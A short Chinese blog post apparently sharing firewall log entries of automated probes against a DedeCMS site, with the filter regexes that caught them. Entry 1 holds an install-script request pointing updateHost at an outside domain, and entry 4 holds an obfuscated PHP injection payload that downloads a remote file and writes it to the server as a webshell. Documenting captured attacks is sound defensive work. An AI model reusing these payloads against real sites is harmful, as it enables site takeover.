主要是为了看看dedecms需要注意处理的地方,这种一般都是批量扫描post提交,这只是防火墙记录下来的,没记录下来的可能就已中招了。
1、
时间 | 2020-02-16 01:59:11 | 用户IP | 110.82.250.106 |
---|---|---|---|
类型 | GET | 过滤器 | url |
URI地址
/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=demodata.php&updateHost=http://acedgwf.cn/
User-Agent
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
过滤规则
\.(bak|inc|old|mdb|sql|php~|swp|java|class)$
传入值
1:/install/index.php.bak
风险值
空
2、
时间 | 2020-03-31 07:40:29 | 用户IP | 59.63.148.113 |
---|---|---|---|
类型 | GET | 过滤器 | url |
URI地址
/data/mysqli_error_trace.inc
User-Agent
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
过滤规则
\.(bak|inc|old|mdb|sql|php~|swp|java|class)$
传入值
1:/data/mysqli_error_trace.inc
风险值
空
3、
时间 | 2020-03-30 07:03:35 | 用户IP | 207.244.118.20 |
---|---|---|---|
类型 | POST | 过滤器 | post |
URI地址
/plus/diy.php
User-Agent
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36 JuziBrowser
过滤规则
\s+(or|xor|and)\s+.*(=|<|>|‘|")
传入值
29: days trial _ and it even includes International Long Distance Calling. You have customers waiting to talk with you right now_ don_t keep them waiting. CLICK HERE http://www.talkwithwebvisitor.com to try Talk With Web Visitor now. If you‘d like to unsubscribe click here http://talkwithwebvisitor.com/unsubscribe.aspx?d=xx.com
风险值
空
4、
时间 | 2020-03-06 18:45:22 | 用户IP | 125.42.221.121 |
---|---|---|---|
类型 | POST | 过滤器 | post |
URI地址
/index.php?m=vod-search
User-Agent
Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html
过滤规则
/\*
传入值
wd:delete一大堆空白字符=ass.ert{if-A:var_dump(parse_str(str_replace(_,e,substr($iar[2][0],-10,8))))||var_dump(parse_str(str_replace(x,e,substr($iar[2][0],-25,15))))||var_dump($a($b(ZmlsZV9wdXRfY29udGVudHMoJy4vY29uZmlnOS5waHAnLGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL2xhLmxhbGEtbXkuY2x1Yi9pbmMudHh0JykpOyA7)))/*\x5C//b=basx64_decodea=ass_rt*/}{endif-A}
风险值
空
5、
评论前必须登录!
注册